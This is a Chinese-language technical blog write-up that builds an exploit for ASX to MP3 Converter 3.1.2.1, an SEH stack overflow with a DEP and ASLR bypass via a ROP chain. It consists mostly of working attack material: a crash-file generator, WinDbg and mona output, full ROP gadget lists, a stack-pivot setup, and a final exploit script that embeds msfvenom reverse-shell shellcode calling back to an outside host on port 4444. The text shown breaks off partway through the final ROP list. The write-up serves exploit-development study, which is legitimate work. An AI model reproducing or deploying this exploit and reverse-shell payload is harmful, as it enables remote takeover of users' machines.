Technical Memorandum
0%

ASX to MP3 Converter 3.1.2.1 DEP and ASLR bypass using ROP gadgets

发表于 更新于 分类于 Valine:

测试环境:Windows 10 21H2 32位,开启全局DEP。这里来看如何绕过DEPASLR

没得说,肯定是先看需要多少字节能够Crash程序。简单的步骤就不说了,讲一下我遇到的一些小坑。

参考exploit-dbhttps://www.exploit-db.com/exploits/14191。这里选择字节长度为`50000`。

1
2
3
4
5
6
7
#!/usr/bin/python3

total_size = 50000
filename="crash.asx"
junk = b"A"*total_size
with open(filename,"wb") as filehander:
	filehander.write(junk)

程序Crash的时候,发现把SEH链给覆盖了:

seh

所以,这里应该是基于SEH的栈溢出,需要绕过DEPASLR

在寻找Offset的时候,遇到一个小坑。这里可以用msf-pattern_create -l 50000生成,或者windbg加载mona之后,使用!py mona pc 50000生成,生成没有问题,主要是在确定具体的Offset的时候,出现了一点小问题。

注意看windbg中,通过mona查找到的具体Offset

seh

看一下msf-pattern_offset中查找到的具体Offset

seh

最后的正确Offset为43474。个人感觉是因为pattern太长了,里面的字符串出现了重复,而windbgmona没有搜索完,只搜索到第一个就停止了,所以,后续查找Offset的时候,最好两边一起验证下,如果有多个值符合条件,每个值最好也试一下。

seh

Offset偏移是正确的,注意标红的框,这里有个小细节,42424242之后被覆盖了ffffffff,这个ffffffff应该是SEH链的尾部。后续在查找坏字符的时候,会发现04030201没找到,原因是因为被ffffffff覆盖了。基于这一点,后续在写利用代码的时候,可以在Offset之后先跟一段\x90,然后再接shellcode,以防shellcode被覆盖导致不能执行。

注意,在查找坏字符的时候,需要定位坏字符串的位置,这里可以利用windbg中的搜索功能,需要先用!teb获取当前内存的空间大小及地址,然后再查找:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0:000> !teb
TEB at 003cf000
    ExceptionList:        000fbca8
    StackBase:            00150000
    StackLimit:           000e0000
    SubSystemTib:         00000000
    FiberData:            00001e00
    ArbitraryUserPointer: 00000000
    Self:                 003cf000
    EnvironmentPointer:   00000000
    ClientId:             000010cc . 00001adc
    RpcHandle:            00000000
    Tls Storage:          006dba30
    PEB Address:          003ce000
    LastErrorValue:       0
    LastStatusValue:      c0000034
    Count Owned Locks:    0
    HardErrorMode:        0
0:000> s -a 000e0000 00150000 BBBB

搜索的命令为:

1
s -a 000e0000 00150000 BBBB

seh

显然,第一个坏字符为09,后续发现0a也是坏字符:

seh

最终坏字符为\x00\x09\x0a

讲一点小知识:对于开启DEP且基于SEH的栈溢出,不能使用之前讨论的未开启DEPSEH栈溢出利用方法。因为开启DEP之后,栈空间是不可执行的,而之前SEH利用方式中组合P/P/RJMP的方式,在P/P/R执行完之后,后续跳转到JMP指令上,因为该指令在栈上面导致无法执行。正确的方法是直接用能跳转到ROP Chain上的指令覆盖SEH Handler

考虑到Bypass ASLR,在构建ROP Chain的时候,如果程序运行时没能泄漏出某个函数的地址,则需要选择没有开启ASLRDLL,不然可以先计算出基址,然后ROP Gadget都选择相对地址构建ROP Chain即可。这里选择没开启ASLRDLL

seh

在用mona自动生成ROP Chain的时候,发现生成不成功,如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      #[---INFO:gadgets_to_set_ebp:---]
      0x10031e12,  # POP EBP # RETN [MSA2Mfilter03.dll] 
      0x10031e12,  # skip 4 bytes [MSA2Mfilter03.dll]
      #[---INFO:gadgets_to_set_ebx:---]
      0x10013734,  # POP EBX # RETN [MSA2Mfilter03.dll] 
      0xffffffff,  #  
      0x100319d3,  # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll] 
      0x100319d3,  # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll] 
      #[---INFO:gadgets_to_set_edx:---]
      0x00000000,  # [-] Unable to find gadget to put 00001000 into edx
      #[---INFO:gadgets_to_set_ecx:---]
      0x10021292,  # POP ECX # RETN [MSA2Mfilter03.dll] 
      0xffffffff,  #  
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
      #[---INFO:gadgets_to_set_edi:---]
      0x1001a514,  # POP EDI # RETN [MSA2Mfilter03.dll] 
      0x1002a602,  # RETN (ROP NOP) [MSA2Mfilter03.dll]
      #[---INFO:gadgets_to_set_esi:---]
      0x100218a9,  # POP ESI # RETN [MSA2Mfilter03.dll] 
      0x1002ab52,  # JMP [EAX] [MSA2Mfilter03.dll]
      0x1002f9ed,  # POP EAX # RETN [MSA2Mfilter03.dll] 
      0x1005d060,  # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
      #[---INFO:pushad:---]
      0x10014720,  # PUSHAD # RETN [MSA2Mfilter03.dll] 
      #[---INFO:extras:---]
      0x100371f5,  # ptr to 'call esp' [MSA2Mfilter03.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()

注意看,里面说没有找到设置EDXROP Gadgets。这里在构造设置EDXROP Gadgets的时候,因为牵涉到EBX,需要将设置EBX值的ROP Gadgets放到设置EDXROP Gadgets后面去。来看看我构造的设置EDXROP Gadget

1
2
3
4
5
6
7
8
9
10
11
12
#[---INFO:gadgets_to_set_edx:---]
    0x100319c0,  # POP EDX # RETN
    0x80808080,  # First value to be added
    0x1001505a,  # POP EBX # RETN
    0x7f7f8f80,  # Second value to be added
    0x10029f3e,  # ADD EDX,EBX # POP EBX # RETN 0x10
    0xdeadbeaf,
    0x10018487,  # POP ECX # RETN [MSA2Mfilter03.dll] 
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,

因为RETN 0x10指令的存在,这里需要把设置ECX的其中一条ROP Gadget放到设置EDXROP Gadgets中间。

修改之后的ROP Gadgets如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
def create_rop_chain():

  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = [
    #[---INFO:gadgets_to_set_ebp:---]
    0x100501df,  # POP EBP # RETN [MSA2Mfilter03.dll] 
    0x100501df,  # skip 4 bytes [MSA2Mfilter03.dll]
    #[---INFO:gadgets_to_set_edx:---]
    0x100319c0,  # POP EDX # RETN
    0x80808080,  # First value to be added
    0x1001505a,  # POP EBX # RETN
    0x7f7f8f80,  # Second value to be added
    0x10029f3e,  # ADD EDX,EBX # POP EBX # RETN 0x10
    0xdeadbeaf,
    0x10018487,  # POP ECX # RETN [MSA2Mfilter03.dll] 
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    # 0x00000000,  # [-] Unable to find gadget to put 00001000 into edx
    #[---INFO:gadgets_to_set_ecx:---]
    0xffffffff,  #  
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    #[---INFO:gadgets_to_set_ebx:---]
    0x1001505a,  # POP EBX # RETN [MSA2Mfilter03.dll] 
    0xffffffff,  #  
    0x100319d3,  # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll] 
    0x100319d3,  # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll] 
    #[---INFO:gadgets_to_set_edi:---]
    0x100290a8,  # POP EDI # RETN [MSA2Mfilter03.dll] 
    0x1002a602,  # RETN (ROP NOP) [MSA2Mfilter03.dll]
    #[---INFO:gadgets_to_set_esi:---]
    0x100217e1,  # POP ESI # RETN [MSA2Mfilter03.dll] 
    0x1002ab52,  # JMP [EAX] [MSA2Mfilter03.dll]
    0x1002ca2d,  # POP EAX # RETN [MSA2Mfilter03.dll] 
    0x1005d060,  # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
    #[---INFO:pushad:---]
    0x10014720,  # PUSHAD # RETN [MSA2Mfilter03.dll] 
    #[---INFO:extras:---]
    0x100371f5,  # ptr to 'call esp' [MSA2Mfilter03.dll]
  ]
  return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

小知识点:RETN操作:先EIP=ESP,然后ESP=ESP+4RETN N操作:先EIP=ESP,然后ESP=ESP+4+N

ROP Gadgets构造完成之后,现在就是如何让SEH Handler执行的时候,能够跳转到ROP Gadgets的第一条指令,这里一定要跳转到ROP Gadgets的第一条指令,前面不能加\x90进行填充,这里和shellcode之前的\x90填充不一样,这里因为有RETN指令,如果用\x90填充,会把\x90\x90\x90\x90设置为EIP的值,而这会指向一个无效的地址。shellcode之前的\x90填充,因为使用的JMP ESP指令,就算跳转到\x90所在区域,并不会把\x90\x90\x90\x90设置为EIP的值,EIP的值指向\x90\x90\x90\x90,只会不断的跳过这些\x90空指令,直到遇到shellcode第一条指令。

暂时设置SEH Handler的值为\xcc\xcc\xcc\xcc,然后重新运行,当溢出发生的时候,来看一下此刻ROP ChainESP之间的距离:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
(1c78.1948): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\ASX to MP3 Converter\ASX2MP3Converter.exe
eax=02816040 ebx=90909090 ecx=00001102 edx=00000001 esi=90909090 edi=02816040
eip=00430402 esp=000f1254 ebp=02816040 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
ASX2MP3Converter+0x30402:
00430402 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !teb
TEB at 0026e000
    ExceptionList:        000fbca8
    StackBase:            00150000
    StackLimit:           000e0000
    SubSystemTib:         00000000
    FiberData:            00001e00
    ArbitraryUserPointer: 00000000
    Self:                 0026e000
    EnvironmentPointer:   00000000
    ClientId:             00001c78 . 00001948
    RpcHandle:            00000000
    Tls Storage:          063ba458
    PEB Address:          0026d000
    LastErrorValue:       206
    LastStatusValue:      c0000034
    Count Owned Locks:    0
    HardErrorMode:        0
0:000> s -d 000e0000 00150000 100501df
00109d00  100501df 100501df 100319c0 80808080  ................
00109d04  100501df 100319c0 80808080 1001505a  ............ZP..
0:000> ? 00109d00  - esp
Evaluate expression: 101036 = 00018aac

可以看到两者之间的距离在18aach,现在需要找到能够跳转大于等于18aachROP Gadget来替换SEH Handler中的值。使用如下命令:

1
!py mona stackpivot -n -m MSA2Mfilter03.dll -distance 101036 -cpb '\x00\x09\x0a'

seh

最终的结果会保存到stackpivot.txt文件里面。来看一下文件里面的部分内容:

seh

这里选择的0x1001f35f地址所在的ROP Gadget。但是这里跳转了19000h,会跳到ROP Chain里面去,我们需要在ROP Chain前面增加一些\x90,让ESP正好能够指向ROP Chain的第一条指令。具体的值需要不断的调试才能确定,主要是因为添加的\x90也会占用空间,会让ESPROP Chain之间的距离变长。最终得到的\x90长度为57424。这里我还考虑了一下,这个值会不会让最终的PAYLOAD指到栈空间以外的地方。验证了一下:

seh

空间足够大,没问题。

最终的利用代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
#!/usr/bin/python3
import struct


total_size = 50000
filename="exploit.asx"

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x09\x0a'
shellcode =  b""
shellcode += b"\xda\xd6\xbb\x78\xef\x7a\x2d\xd9\x74\x24\xf4"
shellcode += b"\x5a\x31\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\x22\xfc\x98\xd8\x2e\xea\xdf\x23\xce\xeb"
shellcode += b"\xbf\xaa\x2b\xda\xff\xc9\x38\x4d\x30\x99\x6c"
shellcode += b"\x62\xbb\xcf\x84\xf1\xc9\xc7\xab\xb2\x64\x3e"
shellcode += b"\x82\x43\xd4\x02\x85\xc7\x27\x57\x65\xf9\xe7"
shellcode += b"\xaa\x64\x3e\x15\x46\x34\x97\x51\xf5\xa8\x9c"
shellcode += b"\x2c\xc6\x43\xee\xa1\x4e\xb0\xa7\xc0\x7f\x67"
shellcode += b"\xb3\x9a\x5f\x86\x10\x97\xe9\x90\x75\x92\xa0"
shellcode += b"\x2b\x4d\x68\x33\xfd\x9f\x91\x98\xc0\x2f\x60"
shellcode += b"\xe0\x05\x97\x9b\x97\x7f\xeb\x26\xa0\x44\x91"
shellcode += b"\xfc\x25\x5e\x31\x76\x9d\xba\xc3\x5b\x78\x49"
shellcode += b"\xcf\x10\x0e\x15\xcc\xa7\xc3\x2e\xe8\x2c\xe2"
shellcode += b"\xe0\x78\x76\xc1\x24\x20\x2c\x68\x7d\x8c\x83"
shellcode += b"\x95\x9d\x6f\x7b\x30\xd6\x82\x68\x49\xb5\xca"
shellcode += b"\x5d\x60\x45\x0b\xca\xf3\x36\x39\x55\xa8\xd0"
shellcode += b"\x71\x1e\x76\x27\x75\x35\xce\xb7\x88\xb6\x2f"
shellcode += b"\x9e\x4e\xe2\x7f\x88\x67\x8b\xeb\x48\x87\x5e"
shellcode += b"\xbb\x18\x27\x31\x7c\xc8\x87\xe1\x14\x02\x08"
shellcode += b"\xdd\x05\x2d\xc2\x76\xaf\xd4\x85\xb8\x98\xdb"
shellcode += b"\xdc\x51\xdb\xe3\xcf\xfd\x52\x05\x85\xed\x32"
shellcode += b"\x9e\x32\x97\x1e\x54\xa2\x58\xb5\x11\xe4\xd3"
shellcode += b"\x3a\xe6\xab\x13\x36\xf4\x5c\xd4\x0d\xa6\xcb"
shellcode += b"\xeb\xbb\xce\x90\x7e\x20\x0e\xde\x62\xff\x59"
shellcode += b"\xb7\x55\xf6\x0f\x25\xcf\xa0\x2d\xb4\x89\x8b"
shellcode += b"\xf5\x63\x6a\x15\xf4\xe6\xd6\x31\xe6\x3e\xd6"
shellcode += b"\x7d\x52\xef\x81\x2b\x0c\x49\x78\x9a\xe6\x03"
shellcode += b"\xd7\x74\x6e\xd5\x1b\x47\xe8\xda\x71\x31\x14"
shellcode += b"\x6a\x2c\x04\x2b\x43\xb8\x80\x54\xb9\x58\x6e"
shellcode += b"\x8f\x79\x78\x8d\x05\x74\x11\x08\xcc\x35\x7c"
shellcode += b"\xab\x3b\x79\x79\x28\xc9\x02\x7e\x30\xb8\x07"
shellcode += b"\x3a\xf6\x51\x7a\x53\x93\x55\x29\x54\xb6"


def create_rop_chain():

  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = [
    #[---INFO:gadgets_to_set_ebp:---]
    0x100501df,  # POP EBP # RETN [MSA2Mfilter03.dll] 
    0x100501df,  # skip 4 bytes [MSA2Mfilter03.dll]
    #[---INFO:gadgets_to_set_edx:---]
    0x100319c0,  # POP EDX # RETN
    0x80808080,  # First value to be added
    0x1001505a,  # POP EBX # RETN
    0x7f7f8f80,  # Second value to be added
    0x10029f3e,  # ADD EDX,EBX # POP EBX # RETN 0x10
    0xdeadbeaf,
    0x10018487,  # POP ECX # RETN [MSA2Mfilter03.dll] 
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    # 0x00000000,  # [-] Unable to find gadget to put 00001000 into edx
    #[---INFO:gadgets_to_set_ecx:---]
    0xffffffff,  #  
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
